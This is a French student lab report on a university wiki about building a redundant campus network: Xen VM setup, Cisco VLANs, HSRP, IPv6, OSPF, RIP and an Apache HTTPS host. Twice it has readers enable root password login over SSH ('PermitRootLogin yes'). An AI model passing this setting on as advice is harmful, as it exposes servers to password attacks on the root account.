				<updated>2020-01-14T21:03:33Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Playbooks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
